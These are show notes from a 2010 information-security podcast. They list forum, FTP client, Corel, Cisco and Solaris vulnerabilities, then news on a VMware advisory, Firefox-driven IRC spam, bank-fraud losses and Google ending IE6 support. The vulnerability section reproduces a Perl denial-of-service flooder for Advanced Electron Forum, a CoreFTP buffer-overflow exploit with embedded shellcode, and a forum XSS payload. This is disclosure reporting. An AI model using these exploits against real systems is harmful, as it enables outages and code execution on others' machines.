InfoSec Podcast Episode 60 for February 3, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com. is putting on their Data Recovery Class February 9th to 13th. The class is in Atlanta and there are still has seats available!! Please email smoulton at nicservices dot com for seating information.
MyHardDriveDied.com.will be in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191
MHDD Data Recovery Class April 12th to 16 in Washington DC goto MyHardDriveDied.com or email smoulton dot nicservices.com for more information.
Vulnerabilities of Interest:
- Electron Forum is subject to multiple Search Denial Of Service Vulnerabilities. This affects version 1.0.8, though other version may be impacted. Exploit code is available:
#!/usr/bin/perl
use IO::Socket;
print q{
##################################################
# He Advanced Electron Forum Multiple Search DOS #
# Tested on AEF 1.0.8 #
# Created By Ashiyane Digital Security Team !
#
##################################################
};
$rand=rand(10);
print “Forum Host: “;
$serv = <stdin>;
chop ($serv);
print “Forum Path: “;
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$postit =
“index.php?act=search&sact=results&allwords=Cair3x&exactph
rase=999999&atleastone=9999&without=999999&within=-19999999&
;starter=99999999999999&forums%5B%5D=0&showas=199999&search=%D8
%AC%D8%B3%D8%AA%D8%AC%D9%88″;$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => “$serv”,
PeerPort => “80″,
Proto => “tcp”,
);
die “\nThe Socket Can’t Connect To The Desired Host or the Host is
MayBe DoSed: $!\n” unless $sock;print $sock “POST $path”.”index.php?act=search
HTTP/1.1\n”;
print $sock “Host: $serv\n”;
print $sock “Accept:
text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0
.9,text/plain;q=0.8,image/png,*/*;q=0.5\n”;
print $sock “Referer: $serv\n”;
print $sock “Accept-Language: en-us\n”;
print $sock “Content-Type: application/x-www-form-urlencoded\n”;
print $sock “Accept-Encoding: gzip, deflate\n”;
print $sock “User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n”;
print $sock “Connection: Keep-Alive\n”;
print $sock “Cache-Control: no-cache\n”;
print $sock “Content-Length: $lrg\n\n”;
print $sock “$postit\n”;
close($sock);## Print a “+” for every loop
syswrite STDOUT, “+”;
}
print “Forum Be Fuke Raft. Test Konid …\n”; - Simple Machines Forums is subject to a Cross-Site Scripting Vulnerability. Exploit code is available and requires that you write code in a text file and then save it as a jpeg. For example: “script.jpg” is really <Script>Alert(‘Xss By Ashiyane (Cair3x)’)</Script>. http://www.sample.com/Smf/attachments/Number/attach_Script_jpg_Hash(script.jpg)
- Corel Paint Shop Pro Photo X2 is subject to a heap-based buffer overflow. Corel Paint Shop Pro Photo X2 Ultimate 12.50 is vulnerable, while older versions are probably affected too they were not checked. Corel Paint Shop Pro Photo X2 is prone to a heap-based buffer overflow
when processing malformed FPX files, because it trusts user-controlled data located inside a FPX file and uses it as a loop counter when
copying data from a FPX file into a fixed-size buffer located in the heap. This vulnerability can be exploited to overwrite adjacent heap
chunks metadata, and possibly to gain arbitrary code execution (though it does not seem easy).
When processing certain structures from a FPX file, Corel Paint Shop Pro Photo X2 allocates fixed-size (0xC08 bytes) buffers, and copies data
from the FPX file to that buffer. But the application trusts certain bytes from the FPX file and uses them as loop counters for the copy
operation, without properly verifying that these bytes have legal values. If those user-controlled bytes used as counters have large values, the buffer overflow will be triggered. Proof of Concept code is available. - Cisco Secure Desktop XSS/JavaScript Injection. The Cisco Secure Desktop web application does not sufficiently verify if a well-formed request was provided by the user who submitted the POST request. The content of the POST field is not being encoded at the time of using them in HTML output, therefore allowing an attacker who controls their content to insert JavaScript code. Furthermore, we could possibly inject
JavaScript code into the ‘start.html’ page because the content of the previously mentioned POST is used in ‘binary/mainv.js’ as input for an
‘eval()’ function, hence allowing an attacker to inject any code without restrictions which will be executed in the context of the ‘eval()’ function. Proof of Concept code is available. - Oracle Solaris is subject to a UCODE_GET_VERSION IOCTL Kernel NULL local priviledge escalation vulnerability. Solaris 10 with 127128-11 and w/o 143913-01 (x86) and OpenSolaris build snv_69 through snv_133 (x86)are affected. The vulnerability allows a local unprivileged user the ability to panic a Solaris x86 Intel-based system (32-bit/64-bit mode) due to a NULL pointer dereference. The ability to panic a system is a type of Denial of Service (DoS). The issue can be triggered by sending a specially crafted IOCTL request to the kernel.
- CoreFTP version 2.1 is subject to a Stack Buffer Overflow and Universal BOF vulnerabilities. The vulnerability can be triggered by convincing a user to submit an overly long String for the SSH password. The buffer is unchecked, resulting in control of the instruction pointer, allowing for arbitrary code injection. PoC code is available:
#!/usr/bin/python
print”|——————————————————————|”
print “| __ __ |”
print “| _________ ________ / /___ _____ / /____ ____ ________ |”
print “| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __`__ \ |”
print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |”
print “| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_//_/ |”
print “| |”
print “|
http://www.corelan.be:8800 |”
print “|
security@corelan.be |”
print “| |”
print “|————————————————-[ EIP Hunters]–|”
print “[+] CoreFTP v2.1 b1637 (password field) Universal BOF
exploit”sc =
(“\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49″;
“\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36″;
“\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34″;
“\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41″;
“\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e”;
“\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58″;
“\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47″;
“\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58″;
“\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38″;
“\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a”;
“\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30″;
“\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57″;
“\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58″;
“\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30″;
“\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c”;
“\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44″:
“\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50″;
“\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f”;
“\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33″;
“\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f”;
“\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f”;
“\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50″;
“\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d”;
“\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45″;
“\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f”;
“\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38″;
“\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55″;
“\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d”;
“\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d”;
“\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38″;
“\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35″;
“\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37″;
“\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56″;
“\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56″;
“\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54″;
“\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54″;
“\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53″;
“\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51″;
“\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35″;
“\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35″;
“\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c”;
“\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f”;
“\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f”;
“\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e”;
“\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a”);
print “[+] Creating buffer string in overflowpassword.txt.”stuff = “\x41″ * 145
stuff += “\x90″ * 5
stuff += sc
stuff += “\x41″ * (1008-len(stuff)-5)
stuff += “\xe9\x7c\xfc\xff\xff” # Lets fly
stuff += “\xeb\xf9\x90\x90″ # Jump back
stuff += “\x0b\x0b\x27\x00″ # partial/null overwritef1 = open(‘overflowpassword.txt’,'w’);
f1.write(stuff);
f1.close();
News Items of Interest:
News item 1: http://lists.vmware.com/pipermail/security-announce/2010/000078.html
VMware advises on vulnerabilities that relate to problems in the Java Runtime Environment (JRE) where several of the 47 flaws can be used by an attacker to compromise a systems.
This includes ESX, Server, VirtualCenter and vCenter. According to the company, a number of the issues relate to problems in the Java Runtime Environment (JRE) and several of the 47 vulnerabilities can be used by an attacker to compromise a system.
VMware vCenter 4.0, VMware Server 2.0, VMware ESX 4.0, 3.5 and 3.0.3, VirtualCenter 2.5 and 2.0.2 and VMware VMA 4.0 are all affected. An update for VirtualCenter 2.5 has been released. Security updates for the other products are still pending completion.
News item 2: http://blog.freenode.net/2010/01/javascript-spam/
Underscoring a little-known web vulnerability, hackers are exploiting a weakness in the Mozilla Firefox browser to wreak havoc on Freenode and other networks that cater to users of internet relay chat.
Using a piece of javascript embedded into a web link, the hackers force users of the open-source browser to join IRC networks and flood channels with diatribes that include the same internet address. As IRC users with Firefox follow the link, their browsers are also forced to spam the channels, giving the attack a viral quality that has has caused major disruptions for almost a month.
The malicious javascript exploits a feature that allows Firefox to send data over a variety of ports that aren’t related to web browsing. By relaying the scripts over port 6667, users who click on the link automatically connect to the IRC server and begin spewing a tirade of offensive text and links. The attack doesn’t work with Internet Explorer or Apple Safari, but “might” work with other browsers.
IRC networks such as Efnet and OFTC have managed to block the attacks, but at time of writing Freenode operators were still struggling to repel them.
News item 3: http://www.krebsonsecurity.com/wp-content/uploads/2010/01/CCE01052010_00000.pdf and http://www.krebsonsecurity.com/wp-content/uploads/2010/01/sharedhopereport.pdf
When a computer virus infection at a business allows thieves to steal tens of thousands of dollars from the company’s commercial banking account, banks typically don’t reimburse the victim company. But the truth is, most banks make that decision on a case-by-case basis. Take, for example, the case of two Umpqua Bank customers in Vancouver, Wash., both of which suffered major financial losses last year after compromises at employee computers allowed thieves to access their accounts remotely.
Battle Ground Cinema Clark County businessman Elie Kassab watched more than $81,000 vanish from his Battle Ground Cinema bank account in March. Umpqua was alerted to the thefts and traced the money to several East Coast accounts but was only able to recover $18,193.53 before the money disappeared offshore.
Similarly, Shared Hope International, a Vancouver-based nonprofit for impoverished women, lost $179,000 in May when three unauthorized transfers swept the funds away to a Russian bank. That money was not recovered.
In both cases, Umpqua confirmed the thefts, and identified security breaches in its clients’ computer systems that it says allowed the thieves to access their accounts remotely. Umpqua has since refunded the entire amount lost by Shared Hope but is still battling with Kassab over who’s to blame for the fraudulent transfers.
According to The Columbian, both companies were refunded the lost money, but the bank demanded Kassab give the money back after its forensic examiner reportedly found a number of virus infections on his PC. The bank never asked for the $179,000 back from the other victim organization, which was founded by former U.S. Congresswoman Linda Smith (R)
News item 4: http://news.bbc.co.uk/2/hi/technology/8488751.stm
Google has begun to phase out support for Internet Explorer 6, the browser identified as the weak link in a cyber attack on the search engine. The firm said from 1 March some of its services, such as Google Docs, would not work “properly” with the browser. It recommended individuals and firms upgrade “as soon as possible”.
